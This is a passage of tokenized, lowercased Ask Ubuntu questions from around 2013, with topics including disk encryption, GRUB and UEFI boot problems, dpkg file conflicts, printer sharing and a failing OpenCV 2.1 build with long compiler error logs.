available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise uname -a linux bigjeff 3.8.0-34-generic # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 x86_64 x86_64 x86_64 gnu/linux i was able to remove it from my sources list following the answer to this post : how do i remove a broken software source ? this is a wiki last edited october 2013 explaining that it has been shutdown : https : //help.ubuntu.com/community/medibuntu once again , i am just looking to alleviate confusion for novices/newbies to ubuntu , like myself , and promote good security practices .
396128	the numlock light is reversed	when the light is on the pad works , and vica versa . i ca n't see how to change this , i have tried restarting with the button pressed down while the computer is off , but that did n't work . i suspect my keyboard ( a new , ultra slim one ) is controlled by a micro chip , not a physical switch .
396129	laptop hotspot during sleep mode	i turned my laptop into a hotspot what i wish to know if it is possible that my hotspot can be access if my laptop is in sleep mode . thank you for help
396133	data loss when switching media server from server to desktop	i have a server running ubuntu server through command line , but i am not good with the command line . a friend of mine always kept it up to speed on the difficult tasks and errors , and i could basically do the simple stuff only , such as copy files , delete folders , and update . now the sad fact is my friend passed away too young , and besides the obvious grief i am left with a server i can not maintain properly . i am too much of a novice to try and pick it up from scratch right now , but i do have 7.5 tb of data on the machine apart from the system drive . can i do a wipe of the system drive , install ubuntu desktop and start using that as a more user friendly type mediaserver ? or would the uninstallation of the ubuntu server cause any problems with my ( seperately stored ) data downloaded by the server . please understand my level , i am willing to learn but i am a bit out of place amoung the experts . thanks for any help
396136	encrypted home partition + encrypted swap + working hibernate	i would like to set up disk encryption on ubuntu 13.10 such that i have plain / encrypted /home partition encrypted swap partition working hibernation and resume as these requirements suggest , this is to protect me from a potential laptop thief reading my personal data . with / being unencrypted , it does not protect from somebody taking the laptop , installing a keylogger , and giving it back to me . i have read enablehibernatewithencryptedswap but it 's written for ubuntu 12.04 , and i 'm not confident that it still works or that it 's the recommended way . what would be up-to-date setup ?
396140	2x rdp-client on ubuntu 13.10	does anybody know if 2xclient ( rdp ) is supported in ubuntu 13.10 , i installed it but it wont start ( no error message , nothing happens )
396144	encrypted home partition + encrypted swap + no-ip	my server runs ubuntu 12.04 with encrypted home partition and swap . i managed to unlock it over the network with dropbear . but before it runs the unlock scripts i would like to run a script for updating my no-ip service . my server is on a dynamic ip address . somebody can help ?
396147	installing steam in some sandbox/container	i was looking into the steam debian package and saw that it adds another repository and a gpg key , which i find pretty troubling , since i do not want to give valve superuser permissions of my computer via upgrades and debian/postinst scripts . is there some way to install steam in some container which does not affect the remainder of the system ?
396148	applications will only run on the unity desktop environment	i am having issues with applications . i recently installed gnome-flash back , and apps wo n't work , not even settings . although all the apps work on the unity desktop environment , the only problem being is that unity is laggy for me and does n't run smoothly unlike gnome-flash back . i ca n't run cheese photo booth , minecraft or even open the settings on flash back . how do i fix this ? thanks in advance .
396153	createprofile failed | adding a re-shared printer	i am trying to add a printer to a newly-installed ubuntu 13.1 laptop . the printer is shared through usb from a windows 7 laptop to a windows xp desktop , which is also sharing the printer . this is due to the windows 7 laptop not playing friendly with the workgroup . here is the cups error log : d [ 26/dec/2013:16:45:07 -0500 ] [ job 8 ] printer-state=3 ( idle ) d [ 26/dec/2013:16:45:07 -0500 ] [ job 8 ] printer-state-message= '' filter failed '' d [ 26/dec/2013:16:45:07 -0500 ] [ job 8 ] printer-state-reasons=none w [ 26/dec/2013:17:30:47 -0500 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'hp-officejet-pro-l7600- gray.. ' already exists w [ 26/dec/2013:17:30:47 -0500 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'hp-officejet-pro-l7600-rgb.. ' already exists e [ 26/dec/2013:17:30:54 -0500 ] [ job 9 ] job stopped due to filter errors ; please consult the error_log file for details . i tried pinging the w7 laptop at its ip address to no return . the workaround i am trying has never worked , but the only way i can view the printer is through the wxp computer . any ideas on how to make this work ?
396158	i want install windows xp	i have ubuntu 13.10 , but now i want windows xp . 1.i insert cd press f12 ( my computer dell n5050 ) use cd-drive and press enter . when come boot cd i press enter and see black screen . so how install windows xp ? thank you for your advice
396161	how to downgrade the thunderbird	i am using thunderbird 24.2.0 and ubuntu 13.10 . i want to downgrade to the thunderbird version 17.0.11esr . http : //www.mozilla.org/en-us/thunderbird/organizations/all-esr.html how can i do this ? sudo apt-get install thunderbird=17.0.11esr did n't work . thank you for your answer ! ! !
396165	ubuntu installation : grubs not showing	i started fresh by installing ubuntu on a blank partition . when i restarted to use ubuntu , it did n't show grubs and went straight to bios . can anyone tell me what happened ?
396167	how can i check if upstart is installed in ubuntu server and how can i install it ?	i want to install upstart to my ubuntu server 13.10 , but i am confused if i need to download the source or install package . in upstart 's getting started page i think they instruct to install the source . but here and here they seem to say that upstart is included with later distributions . i tried initctl in the shell and i got missing command error . does this mean i need to install it from source ? i am new to ubuntu so i would appreciate if you can explain how i can install upstart .
396168	cpu usage increased to 90-100 % after installing nvidia x server	i have latest version of lubuntu and i5 2500k cpu . yesterday i installed nvidia drivers using this guide at www.dedoimedo.com , first method . before i installed drivers i did sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install build-essential sudo apt-get install linux-kernel-headers * then i installed drivers from ubuntu software center and set to use nvidia x server ater installing nvidia drivers i installed following software : steam qbitorrent xchat irc after that my cpu loading increased to 20-30 % when i do usual ask . is there any way to find what cause these issue and restore everything without fresh install ?
396169	ca n't shut down the computer	when i shut down my computer , it does n't shut down , only the screen `` in progress '' is showing , so that i have to push the power button . how do i investigate where the problem is ?
396170	automatic scan scheduled with clamtk for ubuntu 12.04 does not work	the automatic scanner that i have scheduled with clamtk for ubuntu 12.04 does not work . i have to do the job manually . is there a code i can punch into the console that will fix this problem so that an automatic scan can be scheduled on clamtk ? thanks
396172	can not install ubuntu 12.04 alongside windows 8.1	i wanted to install ubuntu 12.04 alongside my windows 8.1 ( model asus x55c ) . i followed instructions of the forums and disabled fast boot . but i did n't find any option to disable uefi mode in boot menu . ( actually , i do n't understand all settings of boot menu ) i also tried to install ubuntu by 'try ubuntu ' through bootable usb .but it did n't see any option like 'intall ubuntu alongside windows 8.1 ' , rather i found that it could not detect any operating system installed in my laptop ( but windows 8.1 was there ! ) . please help me .
396173	getting purple/green screen on watching picture/video	i am a new ubuntu user and my question is : while watching videos or trying to install games the pictures are only showing in green and purple colored screen . what do i do to get better picture/video quality ?
396175	install gnome2 ( ubuntu-desktop ) on ubuntu 13.04 - desktop x86-64	how can i install the gnome 2 version of the ubuntu-desktop package on ubuntu 13.04 - desktop x86-64 ? i 'm aware of the various alternatives and forks ( they do n't meet my desires ) , and i 've tried installing `` ubuntu-desktop '' from the ubuntu 10.10 - desktop x86-64 repositories , but it relies on several packages that are too new in ubuntu 13.04 - desktop x86-64 . any ideas ?
396177	startup disk creator not recognizing selected iso in 13.10	i recently downloaded the lubuntu 12.04 lts iso for power pc ( i want to install it on an old ibook g4 ) , but when i go to select the iso in startup disk creator , it just remains blank in the source disc image ( .iso ) or cd : area . here is the screenshot from before ( and it looks the same afterwards ) selecting the iso . as you can see , the iso is on the desktop separate from any other isos , imgs , etc . i read this question : startup disk creator is not showing the iso image , but that did n't help . neither did startup disc creator not allowing any iso to be loaded or why is n't startup disk creator working in 12.04 ? . two of those are 12.04 and one is 12.10 , so they are both not my version , if that changes anything . does anyone have any clue why this is ? i am going to attempt it with unetbootin and if that fails , manually via the terminal and dd .
396178	shuffling is not working	the shuffling to form the play queuelist is not working . i use banshee 2.6.1 apparently the frequency of songs is independent of their rating . the best rated songs should be more frequent . i 've tried reinstalling . how to fix it ?
396184	block internet access during a period of time except for some applications	i want to know if there 's any way to block internet access during a established period of time ( say 1 pm to 8 pm ) , but with exceptions to some applications such as dropbox and apt-get .
396185	efidisk read error ; ubuntu alongside windows 7 has broken windows	i have just partitioned my relatively new asus k55v windows 7 machine with ubuntu 12.04 . i installed it from a memory stick as usual , following precisely the instructions on the ubuntu website . i chose the size of the new partition , set up my account , installed ubuntu - all seemed normal . i then restarted the system and immediately after 'asus ' pops up before the machine boots up any operating system the message 'error : efidisk read error . ' appears three times , and is followed by the grub menu offering the option of loading ubuntu or windows 7 . that seemed all right , although i was puzzled by the errors ; i went into the ubuntu system , though , and all was good . then i went to go back into windows and , rather than loading up , the message 'error : invalid efi file path . press any key to continue ... ' appeared . pressing any key returns me to the grub menu and windows just will not load , what exactly is going on and how can i fix it ? it is vital that i get windows back since i use windows regularly as well as ubuntu . any help would be very very much appreciated !
396187	out of space in ubuntu partition	i am out of space in my boot partition . i have deleted old images , can not remove apps due to dpkg problem . can i shrink and move my /home partition , and use the recovered space on the back of the boot partition ? i have researched , cleared files that i could , and would appreciate suggestions . thank you ,
396192	grub_hidden_timeout and grub_timeout do not accept 0 value	i am not on a duel boot system , and do not want to view the grub boot menu . i have used methods that have worked in the past to change /etc/default/grub to accomplish that ends , but they have not worked . i have also followed guides , and they have n't worked either . /etc/default/grub looks like this : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor='lsb_release -i -s 2 > /dev/null || echo debian' grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' '' update-grub returns no error messages , and does update /boot/grub/grub.cfg successfully . indeed , editing this file works for any values for grub_hidden_timeout and grub_timeout that are integers and not 0 . the problem is i want 0 values however . how can i get this file to accept 0 values ? this same method of editing has worked on this computer for previous installs . i do n't know what could be causing it to fail now .
396194	how to enable secure boot	i am using windows 7 on my asus g73sw in the past i was able to install ubuntu 12.04lts and windows 7 via a dual boot system through grub . i recently had to reformat my windows os and when i tried to install ubuntu 12.04 lts from a cd via uefi i always get a message saying secure boot not enabled and then it lets me choose to install ubuntu . afterwards the computer hangs and i can not proceed with installation . has anyone come across this issue before ? i have no option in my bios to enable secure boot .
396195	how to avoid `` trying to overwrite x which is also in package y ''	i 'm setting up a large number of ubuntu 12.04 devices . i have a custom .deb i wrote and which will be installed on each device . as part of that .deb , there are several system files i need to overwrite , such as : /etc/update-manager/release-upgrades /etc/apt/apt.conf.d/10periodic /etc/apt/apt.conf.d/50unattended-upgrades but of course ubuntu complains that those files are owned by other packages . when i try to run dpkg -i testing.deb i get errors such as these : dpkg : error processing testing.deb ( -- install ) : trying to overwrite '/etc/update-manager/release-upgrades ' , which is also in package update-manager-core 1:0.156.14 trying to overwrite '/etc/apt/apt.conf.d/50unattended-upgrades ' , which is also in package unattended-upgrades 0.76 i know about the dpkg options like -- force-overwrite which i can use to force it to install , but i was hoping to keep the .deb file really easy to install without additional command-line options , and i can not help but feel like there is probably another solution somewhere in the debian framework . what is the `` right '' way to fix it so my .deb can install with these updated/newer files ?
396196	backup drive issue : seagate backup plus 1tb in not getting detected	i just bought a new seagate backup plus , 1 tb external backup drive , usb 3.0 , it is working good with my windows , but when i login into my ubuntu 12.04 it does not get detected by any way . before purchasing it , i did a short research to find out if its going to work with ubuntu , and i found a thread here ( askubuntu ) justifying that sgate-1tb ext drive is going to work ( lost the link for that thread ) . i tried with my other machines with 12.04 running - no success , however with windows it works great . i tried to see if getting detected in fdisk -l ( doesnât show up in the list ) cant see in /mnt - cant mount it . ( checked with root and normal users ) after failing with all attempts , i check if its getting detected at all , even the usb . lsusb with some ray of hope it showed in terminal bus 001 device 006 : id 0bc2 : a013 seagate rss llc then i opened the disk utility , it display me bank , something like this . please help me . i donât want to be dependent on windows for this . i have been a great admirer of linux ubuntu since from the time i installed it my computer , never crashed or gave any issue except for a superblock once long time back . please help .
396197	how to disable input device ?	how to disable input device in ubuntu ? i have tried blacklisting modules in /etc/modprobe.d , but it seems not working with my laptop .
396199	how to re-enable wordwrap in gedit ?	in previous versions of ubuntu , gedit had a wordwrap option available in the menu option edit - > preferences - > view - > enable text wrapping . but in ubuntu 13.10 , i do n't see a preferences menu anymore . how do i toggle word wrapping ?
396201	how to backport a patch to my current kernel ?	i used to download compat-wireless-3.6.8-1 on ubuntu 12.04 and successfully compile it into target files for compat.ko , cfg80211.ko , mac80211.ko , ath.ko , ath9k_hw.ko , ath9k_common.ko ath9k.ko . now i need to use linux kernel 3.11 above version . so i download the new version with backports-3.13-rc2-1 and use it in the ubuntu 13.10 . but i found that i do n't have .config file to compile it . so , i copy the .config file from source compat-wireless-3.6.8-1 . and use the .config to compile the source code of backports-3.13-rc2-1 . and the results was , there is only compat.ko . my question is that how can i get all the device driver ( for compat.ko , cfg80211.ko , mac80211.ko , ath.ko , ath9k_hw.ko , ath9k_common.ko ath9k.ko . ) and how to compile it use the souce code from backports-3.13-rc2-1 . or where can i find the makefile or .config file for backports-3.13-rc2-1 ?
396203	error when installing opencv 2.1	i want to install opencv in my ubuntu 12.04 but i get this following error . [ 45 % ] building cxx object src/cxcore/cmakefiles/cxcore_pch_dephelp.dir/cxcore_pch_dephelp.o in file included from /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxcore.h:1826:0 , from /home/michael/downloads/open cv/opencv-2.1.0/src/cxcore/_cxcore.h:51 , from /home/michael/downloads/open cv/opencv-2.1.0/release/src/cxcore/cxcore_pch_dephelp.cxx:1 : /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxcore.hpp:177:13 : error : ‘ptrdiff_t’ does not name a type in file included from /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxcore.hpp:2307:0 , from /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxcore.h:1826 , from /home/michael/downloads/open cv/opencv-2.1.0/src/cxcore/_cxcore.h:51 , from /home/michael/downloads/open cv/opencv-2.1.0/release/src/cxcore/cxcore_pch_dephelp.cxx:1 : /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxoperations.hpp:2043:15 : error : ‘ptrdiff_t’ does not name a type /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxoperations.hpp:2591:31 : error : ‘ptrdiff_t’ does not name a type in file included from /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxcore.hpp:2308:0 , from /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxcore.h:1826 , from /home/michael/downloads/open cv/opencv-2.1.0/src/cxcore/_cxcore.h:51 , from /home/michael/downloads/open cv/opencv-2.1.0/release/src/cxcore/cxcore_pch_dephelp.cxx:1 : /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp : in member function ‘void cv : :mat : :locateroi ( cv : :size & , cv : :point & ) const’ : /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:387:5 : error : ‘ptrdiff_t’ was not declared in this scope /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:387:5 : note : suggested alternatives : /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.1/../../../../include/c++/4.6.1/i686-pc-linux-gnu/bits/c++config.h:156:28 : note : ‘std : :ptrdiff_t’ /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.1/../../../../include/c++/4.6.1/i686-pc-linux-gnu/bits/c++config.h:156:28 : note : ‘std : :ptrdiff_t’ /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:387:15 : error : expected ‘ ; ’ before ‘delta1’ /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:389:9 : error : ‘delta1’ was not declared in this scope /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:398:31 : error : ‘delta2’ was not declared in this scope /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp : in member function ‘cv : :point cv : :matconstiterator_ : :pos ( ) const’ : /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3459:9 : error : ‘ptrdiff_t’ was not declared in this scope /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3459:9 : note : suggested alternatives : /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.1/../../../../include/c++/4.6.1/i686-pc-linux-gnu/bits/c++config.h:156:28 : note : ‘std : :ptrdiff_t’ /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.1/../../../../include/c++/4.6.1/i686-pc-linux-gnu/bits/c++config.h:156:28 : note : ‘std : :ptrdiff_t’ /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3459:19 : error : expected ‘ ; ’ before ‘ofs’ /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3460:23 : error : ‘ofs’ was not declared in this scope /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3460:66 : error : expected ‘ ) ’ before ‘y’ /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3465:9 : error : ‘ptrdiff_t’ was not declared in this scope /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3465:9 : note : suggested alternatives : /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.1/../../../../include/c++/4.6.1/i686-pc-linux-gnu/bits/c++config.h:156:28 : note : ‘std : :ptrdiff_t’ /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.1/../../../../include/c++/4.6.1/i686-pc-linux-gnu/bits/c++config.h:156:28 : note : ‘std : :ptrdiff_t’ /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3465:19 : error : expected ‘ ; ’ before ‘ofs’ /home/michael/downloads/open cv/opencv-2.1.0/include/opencv/cxmat.hpp:3466:23 : error : ‘ofs’ was not declared in this scope make [ 2 ] : *** [ src/cxcore/cmakefiles/cxcore_pch_dephelp.dir/cxcore_pch_dephelp.o ] error 1 make [ 1 ] : *** [ src/cxcore/cmakefiles/cxcore_pch_dephelp.dir/all ] error 2 make : *** [ all ] error 2 i have tried adding # include < stddef.h > in cxcore.hpp , but then i get this error [ 45 % ] built target opencv_lapack [ 45 % ] building cxx object src/cxcore/cmakefiles/cxcore_pch_dephelp.dir/cxcore_pch_dephelp.o linking cxx static library ../../lib/libcxcore_pch_dephelp.a [ 45 % ] built target cxcore_pch_dephelp scanning dependencies of target pch_generate_cxcore [ 45 % ] generating _cxcore.h [ 45 % ] generating _cxcore.h.gch/cxcore_release.gch c++ : error : cv/opencv-2.1.0/ . : no such file or directory c++ : error : cv/opencv-2.1.0/release : no such file or directory c++ : error : cv/opencv-2.1.0/include : no such file or directory c++ : error : cv/opencv-2.1.0/include/opencv : no such file or directory c++ : error : cv/opencv-2.1.0/src/cxcore/../../3rdparty/include : no such file or directory c++ : error : cv/opencv-2.1.0/src/cxcore/../../include/opencv : no such file or directory c++ : error : cv/opencv-2.1.0/release/src/cxcore : no such file or directory make [ 2 ] : *** [ src/cxcore/_cxcore.h.gch/cxcore_release.gch ] error 1 make [ 1 ] : *** [ src/cxcore/cmakefiles/pch_generate_cxcore.dir/all ] error 2 make : *** [ all ] error 2 how to fix this problem ? is it impossible to install this version of opencv in ubuntu 12.04 . any help will be appreciated . : ) according to @ steeldriver comment , i have renamed the folder and it works . but i got another error . i use 32 bit ubuntu 12.04 . these are the errors . [ 61 % ] building cxx object src/highgui/cmakefiles/highgui.dir/cvcap_ffmpeg.o in file included from /usr/include/libavutil/avutil.h:318:0 , from /usr/include/libavutil/samplefmt.h:22 , from /usr/include/libavcodec/avcodec.h:30 , from /usr/include/libavformat/avformat.h:140 , from /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:97 : /usr/include/libavutil/common.h : in function ‘int32_t av_clipl_int32_c ( int64_t ) ’ : /usr/include/libavutil/common.h:168:47 : error : ‘uint64_c’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in member function ‘virtual void cvcapture_ffmpeg : :close ( ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:385:9 : warning : ‘void av_close_input_file ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1580 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:385:31 : warning : ‘void av_close_input_file ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1580 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in member function ‘bool cvcapture_ffmpeg : :reopen ( ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:414:5 : warning : ‘void av_close_input_file ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1580 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:414:27 : warning : ‘void av_close_input_file ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1580 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:417:5 : warning : ‘int av_open_input_file ( avformatcontext** , const char* , avinputformat* , int , avformatparameters* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1368 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:417:52 : warning : ‘int av_open_input_file ( avformatcontext** , const char* , avinputformat* , int , avformatparameters* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1368 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:418:5 : warning : ‘int av_find_stream_info ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1412 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:418:27 : warning : ‘int av_find_stream_info ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1412 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:425:5 : warning : ‘int avcodec_open ( avcodeccontext* , avcodec* ) ’ is deprecated ( declared at /usr/include/libavcodec/avcodec.h:4035 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:425:28 : warning : ‘int avcodec_open ( avcodeccontext* , avcodec* ) ’ is deprecated ( declared at /usr/include/libavcodec/avcodec.h:4035 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in member function ‘virtual bool cvcapture_ffmpeg : :open ( const char* ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:450:15 : warning : ‘int av_open_input_file ( avformatcontext** , const char* , avinputformat* , int , avformatparameters* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1368 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:450:63 : warning : ‘int av_open_input_file ( avformatcontext** , const char* , avinputformat* , int , avformatparameters* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1368 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:455:11 : warning : ‘int av_find_stream_info ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1412 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:455:33 : warning : ‘int av_find_stream_info ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1412 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:467:13 : error : ‘codec_type_video’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:470:13 : warning : ‘int avcodec_open ( avcodeccontext* , avcodec* ) ’ is deprecated ( declared at /usr/include/libavcodec/avcodec.h:4035 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:470:36 : warning : ‘int avcodec_open ( avcodeccontext* , avcodec* ) ’ is deprecated ( declared at /usr/include/libavcodec/avcodec.h:4035 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in member function ‘virtual bool cvcapture_ffmpeg : :grabframe ( ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:548:54 : error : ‘avcodec_decode_video’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in function ‘const char* icvffmpegerrstr ( int ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:801:10 : error : ‘averror_numexpected’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:805:10 : error : ‘averror_nofmt’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:807:10 : error : ‘averror_io’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:809:10 : error : ‘averror_nomem’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in function ‘avstream* icv_add_video_stream_ffmpeg ( avformatcontext* , codecid , int , int , int , double , int ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:881:7 : warning : ‘avstream* av_new_stream ( avformatcontext* , int ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1604 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:881:26 : warning : ‘avstream* av_new_stream ( avformatcontext* , int ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1604 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:894:70 : error : ‘codec_type_video’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in function ‘int icv_av_write_frame_ffmpeg ( avformatcontext* , avstream* , uint8_t* , uint32_t , avframe* ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:993:22 : error : ‘pkt_flag_key’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1008:90 : error : ‘av_rescale_q’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1013:30 : error : ‘pkt_flag_key’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in member function ‘virtual void cvvideowriter_ffmpeg : :close ( ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1177:3 : warning : ‘int url_fclose ( aviocontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avio.h:317 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1177:20 : warning : ‘int url_fclose ( aviocontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avio.h:317 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp : in member function ‘virtual bool cvvideowriter_ffmpeg : :open ( const char* , int , double , cvsize , bool ) ’ : /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1210:41 : error : ‘guess_format’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1233:31 : error : ‘av_alloc_format_context’ was not declared in this scope /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1274:9 : warning : ‘int av_set_parameters ( avformatcontext* , avformatparameters* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1640 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1274:35 : warning : ‘int av_set_parameters ( avformatcontext* , avformatparameters* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1640 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1278:5 : warning : ‘void dump_format ( avformatcontext* , int , const char* , int ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1902 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1278:35 : warning : ‘void dump_format ( avformatcontext* , int , const char* , int ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1902 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1303:15 : warning : ‘int avcodec_open ( avcodeccontext* , avcodec* ) ’ is deprecated ( declared at /usr/include/libavcodec/avcodec.h:4035 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1303:36 : warning : ‘int avcodec_open ( avcodeccontext* , avcodec* ) ’ is deprecated ( declared at /usr/include/libavcodec/avcodec.h:4035 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1340:13 : warning : ‘int url_fopen ( aviocontext** , const char* , int ) ’ is deprecated ( declared at /usr/include/libavformat/avio.h:316 ) [ -wdeprecated-declarations ] 